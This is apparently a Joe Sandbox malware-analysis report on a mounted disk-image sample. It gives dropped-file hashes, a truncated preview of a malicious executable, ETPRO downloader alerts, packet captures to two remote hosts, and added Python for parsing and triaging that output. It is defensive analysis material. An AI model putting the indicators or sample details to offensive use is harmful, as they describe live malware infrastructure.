Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 1832
Entropy (8bit): 5.209546127585902
Encrypted: false
SSDEEP: 48:YVJSGfs4/ymI4RfoUefa+gZ9trBLNGIAoc+CrW0RP:+IGH/vIIwLfMZPBRGl+6W0RP
MD5: 30F1C3845D7260E0209CA4AF0CC01270
SHA1: 2CE7D05401487BF9EF57876D90709C1DD8F5C12E
SHA-256: D86513AD1E90A80245B2545BBA936C4B17793AB21567C000899869518850D1E3
SHA-512: 4DD399A976CA4752A0173FD1C646B5561A70D4AEC300FE1E8F7BAAC195DF0CA39C3807CE22028548CC4470726854C68D46286C57914E99EA39AB97CBD251A7A6
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: \Device\CdRom0\9236-pagaconferma-jpg.exe
File Type: data
Category: dropped
Size (bytes): 208384
Entropy (8bit): 7.839491635195646
Encrypted: false
SSDEEP: 3072:xkEDvAXhlKBt6N4ORDuWzi2GUXy3pKHyDQucvz5DUulrlAkfK+L+Xa18:JYLKBIzi2rC3phDVcvz5YerdfK+L+K6
MD5: 8A2119C729ED9E3509D9AC770361D45B
SHA1: EEC173D4D359D01B95677A8E5F888878426E16AE
SHA-256: E0B8F12284F03EF1B6FDD27118DFE9E352FD05896B2A04EB902D3F09A3EBB4AC
SHA-512: B4D89FB2DBE5E872F2CC6C98B26A69944F3B76E8AE6A317AE52F1EB967C81057169F78EDB02BE430C5472D6F00620EF851FD018B6319B09FE20A1E92AA5DEA53
Malicious: false

Process:C:\Windows\SysWOW64\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):303
Entropy (8bit):4.451203473208547
Encrypted:false
SSDEEP:6:wvMYFVEhAhme1ErQNnRC5hHg2a9IKm2Q06X//F:wvMYFVEhAhkZNg2a9JQ06XV
MD5:882C0680CE0CA2F499EAE8EE7C11EBF0
SHA1:763A49D9FAA9866DFE110BA0BED899F050A07DE5
SHA-256:4686CC042A497EED23C27DE04DD9CC2DA4288299CC34DFE6326C57006D8FE223
SHA-512:E11318FBCBC537AD6B7D32BBB609BE81E35A22C9B9E5706BCB301C9C4B2DFD95515965EE14EF5BA00679B49CB30566065603EE7119C8CEF13B964E57DC727EC4
Malicious:false
Preview:....Attached : True..BlockSize : 0..DevicePath : \\.\CDROM0..FileSize : 1703936..ImagePath : C:\Users\user\Desktop\g1TLK7mbZD.img..LogicalSectorSize : 2048..Number : 0..Size : 1703936..StorageType : 1..PSComputerName : ........
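The text file above is a property dump of the mounted image (the field set, Attached, DevicePath, ImagePath, LogicalSectorSize, StorageType, is the one Windows reports for a disk image it has attached), and it records that the submitted .img was mounted as a virtual optical drive from the user's Desktop. The following Python is an added example, not code from the report or from Joe Sandbox: it parses that record and runs the checks an analyst would apply to it. The record is transcribed from the preview, with the unprintable bytes the preview renders as dots restored as line breaks (an assumption about the original layout); the sample size is the one the report states for g1TLK7mbZD.img.

```python
"""Triage a 'Property : Value' dump of a mounted disk image.
Added example; the record below is transcribed from the report's preview."""
from pathlib import PureWindowsPath

DUMP = """\
Attached : True
BlockSize : 0
DevicePath : \\\\.\\CDROM0
FileSize : 1703936
ImagePath : C:\\Users\\user\\Desktop\\g1TLK7mbZD.img
LogicalSectorSize : 2048
Number : 0
Size : 1703936
StorageType : 1
PSComputerName :
"""

SAMPLE_SIZE = 1_703_936   # "File size" of g1TLK7mbZD.img as stated in the report
OPTICAL_SECTOR = 2048     # CD/DVD logical sector size, used by ISO/UDF images


def parse_record(text):
    """Split 'Key : Value' lines into a dict; empty values are kept as ''."""
    record = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            record[key.strip()] = value.strip()
    return record


def triage(record, sample_size=SAMPLE_SIZE):
    """Return the observations an analyst would note about the mounted image."""
    notes = []
    if record.get("Attached") == "True":
        notes.append("image is attached (the mount succeeded)")
    device = record.get("DevicePath", "")
    if device.upper().startswith(r"\\.\CDROM"):
        notes.append(f"exposed as a virtual optical drive ({device})")
    if record.get("LogicalSectorSize") == str(OPTICAL_SECTOR):
        notes.append("2048-byte sectors: an ISO/UDF-style image, not a VHD")
    if record.get("FileSize") == str(sample_size):
        notes.append("FileSize equals the submitted sample size: this is the sample itself")
    path = PureWindowsPath(record.get("ImagePath", ""))
    if len(path.parts) > 2 and path.parts[1].lower() == "users":
        notes.append(f"mounted from a user profile directory ({path.parent})")
    if path.suffix.lower() in {".img", ".iso"}:
        notes.append(f"{path.suffix} file: a double-click mounts it instead of opening a viewer")
    return notes


if __name__ == "__main__":
    for note in triage(parse_record(DUMP)):
        print("-", note)
```

The size comparison is the check that ties the dropped text file back to the sample: it shows the cmd.exe process was inspecting the very image that was submitted, not some other volume.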

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1155263
Entropy (8bit):7.393470208241103
Encrypted:false
SSDEEP:24576:ffmMv6Ckr7Mny5QLMwDMZE4mqu6p0DWsRmic2V993wZCA:f3v+7/5QLMLE2hq93wP
MD5:1AEFAA71B8996D22CAD66A84A7F279A0
SHA1:4EC6F2FE363B2C5422F684C0C2ABFDADDC25B781
SHA-256:227F6FFEC17185B0F15EF324705B35AB5859020ED58345FF63C59DBD5F1A0781
SHA-512:67081CF6EA7A56764B8D97610C69747B6EC352EA5B7C18EF717124D8B926C6394746AAD22C8590920479B9C8C8C0158ED9E0E320562E943A2E81F129AF615164
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

File type:UDF filesystem data (version 1.5) 'DOCUMENTS'
Entropy (8bit):5.661957456506507
TrID:
• ImgBurn Image (2054048/1) 33.29%
• ImgBurn Image (2052548/1) 33.26%
• null bytes (2050048/1) 33.22%
• Photoshop Action (5010/6) 0.08%
• Lotus 123 Worksheet (generic) (2007/4) 0.03%
File name:g1TLK7mbZD.img
File size:1'703'936 bytes
MD5:213a8ce5aaa962f33a78f6053f6956ba
SHA1:339df70ab6152e4b20d81d4180943fc6fcb1f752
SHA256:5d4a99440308479e4b97797fc6518240e1617df62bb938d3f735026931d7bed3
SHA512:206b9ffea2e80b822f9d1f5cbc3963382416d8a0d681ac157eb2647e6f48c816e59469037c1c30ecec96beee14e366de367fcb6aa46a7a132a39ee06d6e89935
SSDEEP:24576:3fmMv6Ckr7Mny5QLMwDMZE4mqu6p0DWsRmic2V993wZC:33v+7/5QLMLE2hq93w
TLSH:1775E112B7D680B6D9A339B12A7BE327EB3575194323C487B7E42E778F211405B36362
                                                                                                                                                                                  File Content Preview:...............................................................................................................................................................................................................................................................

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-24T18:36:01.522384+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.20 | 49790 | 158.101.44.242 | 80 | TCP
2024-10-24T18:36:03.053396+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.20 | 49790 | 158.101.44.242 | 80 | TCP
2024-10-24T18:36:03.459445+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.20 | 49792 | 104.21.67.152 | 443 | TCP
2024-10-24T18:36:03.774476+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.20 | 49793 | 158.101.44.242 | 80 | TCP
2024-10-24T18:36:04.219404+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.20 | 49794 | 104.21.67.152 | 443 | TCP
2024-10-24T18:36:06.972892+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.20 | 49800 | 104.21.67.152 | 443 | TCP
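Joe Sandbox alert and packet tables often come out of text extraction with their columns fused (timestamp, SID, severity, ports and addresses run together into one string, as in the rows embedded below). The following Python is an added example, not code from the report or from Joe Sandbox: it recovers the records by enumerating every cut of a fused field and keeping the single parse consistent with two facts read from the report, that 192.168.11.20 is the analysis VM (unambiguous in packet rows where it is the last column) and that the VM side of each flow uses a dynamic port; alert rows are then resolved against the remote endpoints seen in the packet listing, which removes the remaining "where does the IP end and the port begin" ambiguity. The sample rows are copied from the report; the dynamic port range is the Windows default and is an assumption.

```python
"""Recover structured records from Joe Sandbox alert and packet rows whose
columns were fused by text extraction. Added example, not part of the report."""
import re
from dataclasses import dataclass

# Constructed sample input: rows copied from the report in their fused form.
ALERT_ROWS = [
    "2024-10-24T18:36:01.522384+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049790158.101.44.24280TCP",
    "2024-10-24T18:36:03.459445+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049792104.21.67.152443TCP",
]
PACKET_ROWS = [
    "Oct 24, 2024 18:36:01.000677109 CEST4979080192.168.11.20158.101.44.242",
    "Oct 24, 2024 18:36:01.155700922 CEST8049790158.101.44.242192.168.11.20",
    "Oct 24, 2024 18:36:01.981328011 CEST49791443192.168.11.20104.21.67.152",
    "Oct 24, 2024 18:36:01.981359005 CEST44349791104.21.67.152192.168.11.20",
]
# The VM address is unambiguous in packet rows where it is the last column.
# Assumption: the VM always talks from the Windows default dynamic port range;
# that is what disambiguates the fused digits.
LOCAL_IP = "192.168.11.20"
EPHEMERAL = range(49152, 65536)

PACKET_RE = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)(?P<tail>[\d.]+)$")
ALERT_RE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+[+-]\d{4})"
                      r"(?P<sid>\d{7})(?P<body>.+?)(?P<proto>TCP|UDP)$")


@dataclass(frozen=True)
class Flow:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int

    def endpoints(self):
        """((remote_ip, remote_port), local_port), or None unless exactly one side is the VM."""
        if self.src_ip == LOCAL_IP and self.dst_ip != LOCAL_IP:
            return (self.dst_ip, self.dst_port), self.src_port
        if self.dst_ip == LOCAL_IP and self.src_ip != LOCAL_IP:
            return (self.src_ip, self.src_port), self.dst_port
        return None


def _is_ip(s):
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and int(p) <= 255 and (p == "0" or p[0] != "0") for p in parts)


def _is_port(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def _splits(s, validators):
    """Yield every cut of s into len(validators) pieces, piece i passing validators[i]."""
    if len(validators) == 1:
        if validators[0](s):
            yield (s,)
        return
    for i in range(1, len(s)):
        if validators[0](s[:i]):
            for rest in _splits(s[i:], validators[1:]):
                yield (s[:i],) + rest


def _unique(candidates, row):
    if len(candidates) != 1:
        raise ValueError(f"{len(candidates)} valid parses for row {row!r}")
    return candidates.pop()


def parse_packet_row(row):
    """-> (timestamp, Flow); a parse is kept only if the VM side uses a dynamic port."""
    m = PACKET_RE.match(row)
    if not m:
        raise ValueError(f"not a packet row: {row!r}")
    found = set()
    for sp, dp, sip, dip in _splits(m["tail"], [_is_port, _is_port, _is_ip, _is_ip]):
        flow = Flow(sip, int(sp), dip, int(dp))
        ends = flow.endpoints()
        if ends and ends[1] in EPHEMERAL:
            found.add(flow)
    return m["ts"], _unique(found, row)


def parse_alert_row(row, known_remotes):
    """-> dict; the fused 'dest IP + dest port' is resolved against endpoints from the packet list."""
    m = ALERT_RE.match(row)
    if not m:
        raise ValueError(f"not an alert row: {row!r}")
    body = m["body"]
    cut = body.find(LOCAL_IP)  # the source column is the VM in every alert of this report
    if cut < 1 or not body[cut - 1].isdigit():
        raise ValueError(f"cannot locate severity/source in row {row!r}")
    found = set()
    for sp, dip, dp in _splits(body[cut + len(LOCAL_IP):], [_is_port, _is_ip, _is_port]):
        if int(sp) in EPHEMERAL and (dip, int(dp)) in known_remotes:
            found.add(Flow(LOCAL_IP, int(sp), dip, int(dp)))
    return {"timestamp": m["ts"], "sid": int(m["sid"]), "signature": body[:cut - 1],
            "severity": int(body[cut - 1]), "proto": m["proto"], "flow": _unique(found, row)}


def summarize(alert_rows=ALERT_ROWS, packet_rows=PACKET_ROWS):
    """Remote endpoints contacted by the VM plus the alerts attributed to them."""
    flows = [parse_packet_row(r)[1] for r in packet_rows]
    remotes = {f.endpoints()[0] for f in flows}
    alerts = [parse_alert_row(r, remotes) for r in alert_rows]
    return {"remote_endpoints": sorted(remotes),
            "alerts": [(a["sid"], a["signature"], a["flow"].dst_ip, a["flow"].dst_port) for a in alerts]}


if __name__ == "__main__":
    for key, value in summarize().items():
        print(key, value)
```

A row that admits zero or several valid parses raises instead of guessing; for the rows in this report the constraints leave exactly one, and the result is the endpoint list an analyst would block or hunt on (158.101.44.242:80 and 104.21.67.152:443), with each ETPRO alert tied to the flow it fired on.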

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 18:36:01.000677109 CEST | 49790 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:01.155700922 CEST | 80 | 49790 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:01.155879021 CEST | 49790 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:01.156035900 CEST | 49790 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:01.310839891 CEST | 80 | 49790 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:01.313177109 CEST | 80 | 49790 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:01.322102070 CEST | 49790 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:01.479409933 CEST | 80 | 49790 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:01.522383928 CEST | 49790 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:01.981328011 CEST | 49791 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:01.981359005 CEST | 443 | 49791 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:01.981534958 CEST | 49791 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:01.996344090 CEST | 49791 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:01.996362925 CEST | 443 | 49791 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:02.199912071 CEST | 443 | 49791 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:02.200112104 CEST | 49791 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:02.205264091 CEST | 49791 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:02.205276966 CEST | 443 | 49791 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:02.205558062 CEST | 443 | 49791 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:02.256609917 CEST | 49791 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:02.264463902 CEST | 49791 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:02.308008909 CEST | 443 | 49791 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:02.835405111 CEST | 443 | 49791 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:02.835469007 CEST | 443 | 49791 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:02.835727930 CEST | 49791 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:02.838282108 CEST | 49791 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:02.848227024 CEST | 49790 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:03.004323006 CEST | 80 | 49790 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:03.006683111 CEST | 49792 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:03.006768942 CEST | 443 | 49792 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:03.007018089 CEST | 49792 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:03.007299900 CEST | 49792 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:03.007354021 CEST | 443 | 49792 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:03.053395987 CEST | 49790 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:03.206700087 CEST | 443 | 49792 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:03.208090067 CEST | 49792 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:03.208105087 CEST | 443 | 49792 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:03.459423065 CEST | 443 | 49792 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:03.459497929 CEST | 443 | 49792 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:03.459688902 CEST | 49792 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:03.459976912 CEST | 49792 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:03.462080956 CEST | 49790 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:03.462831020 CEST | 49793 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:03.617213011 CEST | 80 | 49790 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:03.617691040 CEST | 49790 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:03.617794037 CEST | 80 | 49793 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:03.618169069 CEST | 49793 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:03.618169069 CEST | 49793 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:03.773260117 CEST | 80 | 49793 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:03.774074078 CEST | 80 | 49793 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:03.774476051 CEST | 49793 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:03.775003910 CEST | 49794 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:03.775038958 CEST | 443 | 49794 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:03.775326967 CEST | 49794 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:03.775414944 CEST | 49794 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:03.775434017 CEST | 443 | 49794 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:03.929382086 CEST | 80 | 49793 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:03.929569006 CEST | 49793 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:03.975708008 CEST | 443 | 49794 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:03.977037907 CEST | 49794 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:03.977094889 CEST | 443 | 49794 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:04.219372988 CEST | 443 | 49794 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:04.219444990 CEST | 443 | 49794 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:04.219650984 CEST | 49794 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:04.219908953 CEST | 49794 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:04.232743979 CEST | 49795 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:04.387039900 CEST | 80 | 49795 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:04.387456894 CEST | 49795 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:04.387542963 CEST | 49795 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:04.542179108 CEST | 80 | 49795 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:04.545656919 CEST | 80 | 49795 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:04.546533108 CEST | 49796 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:04.546644926 CEST | 443 | 49796 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:04.546809912 CEST | 49796 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:04.546994925 CEST | 49796 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:04.547046900 CEST | 443 | 49796 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:04.605771065 CEST | 49795 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:04.746085882 CEST | 443 | 49796 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:04.747507095 CEST | 49796 | 443 | 192.168.11.20 | 104.21.67.152
Oct 24, 2024 18:36:04.747514009 CEST | 443 | 49796 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:04.990781069 CEST | 443 | 49796 | 104.21.67.152 | 192.168.11.20
Oct 24, 2024 18:36:04.991075993 CEST | 443 | 49796 | 104.21.67.152 | 192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.991274118 CEST49796443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:04.991527081 CEST49796443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:05.011425018 CEST4979580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.011663914 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166043997 CEST8049795158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166095018 CEST8049797158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166418076 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166466951 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166552067 CEST4979580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.320916891 CEST8049797158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.740911961 CEST8049797158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.742012978 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:05.742095947 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.742363930 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:05.742558956 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:05.742613077 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.787079096 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.941416979 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.942876101 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:05.942895889 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.188277006 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.188560009 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.188786983 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.188960075 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.204858065 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.205423117 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359266996 CEST8049797158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359528065 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359673977 CEST8049799158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359854937 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359904051 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.514322996 CEST8049799158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.517585993 CEST8049799158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.518605947 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.518692970 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.518912077 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.519057035 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.519109011 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.568284988 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.724400043 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.725794077 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.725852013 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.972867012 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.972965956 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.973134041 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.973432064 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.975814104 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.976607084 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130239010 CEST8049799158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130503893 CEST8049801158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130584955 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130800009 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130979061 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.284920931 CEST8049801158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.288815022 CEST8049801158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.289836884 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.289917946 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.290136099 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.290278912 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.290323973 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.333698034 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.493808031 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.503272057 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.503331900 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.737905979 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.738197088 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.738354921 CEST49802443192.168.11.20104.21.67.152
